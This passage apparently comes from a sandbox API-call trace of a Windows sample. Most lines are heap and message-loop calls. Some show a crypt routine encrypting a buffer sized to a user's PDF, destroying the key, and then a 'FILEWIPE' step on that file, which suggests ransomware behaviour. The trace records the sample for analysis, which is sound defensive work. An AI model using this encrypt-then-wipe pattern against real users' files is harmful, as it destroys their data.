hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.488] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.489] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.489] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.489] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.489] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.489] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.489] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.489] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.490] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.490] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.490] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.490] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.490] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.490] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.490] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.490] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.490] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.490] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xea9a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xeaa0) returned 1 [0173.490] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.491] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.491] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.491] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.491] CharLowerBuffW (in: lpsz="byte[60065]", cchLength=0xb | out: lpsz="byte[60065]") returned 0xb [0173.491] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.493] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.493] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.493] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.493] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.493] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9d3c28*, pdwDataLen=0x87e820*=0xea9a, dwBufLen=0xeaa0 | out: pbData=0x9d3c28*, pdwDataLen=0x87e820*=0xeaa0) returned 1 [0173.494] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.494] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.494] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.495] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.495] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.495] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.495] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.495] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.495] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.495] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.495] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.495] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.495] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.496] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.496] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.496] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.496] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.499] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.499] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.499] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.504] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.504] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.504] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0173.504] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.504] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0173.504] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.504] CryptDestroyKey (hKey=0x90af98) returned 1 [0173.505] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.505] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.505] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.505] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.505] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0173.505] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0173.505] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.505] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0173.505] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.505] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.505] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.505] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.505] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.505] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.505] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.506] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.506] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.506] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.506] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.506] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.506] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0173.506] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.506] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.506] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.506] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.506] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.506] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.506] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0173.506] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.506] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.506] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.506] FreeLibrary (hLibModule=0x74f20000) returned 1 [0173.506] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.506] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.506] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.507] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.507] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.508] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.508] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0173.508] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.509] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.509] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaf22dc0, ftCreationTime.dwHighDateTime=0x1d5e632, ftLastAccessTime.dwLowDateTime=0x179d67e0, ftLastAccessTime.dwHighDateTime=0x1d5debb, ftLastWriteTime.dwLowDateTime=0x179d67e0, ftLastWriteTime.dwHighDateTime=0x1d5debb, nFileSizeHigh=0x0, nFileSizeLow=0xea9a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="XjtJup63.pdf", cAlternateFileName="")) returned 0x90af58 [0173.509] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0173.509] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0173.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0173.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0173.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0173.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 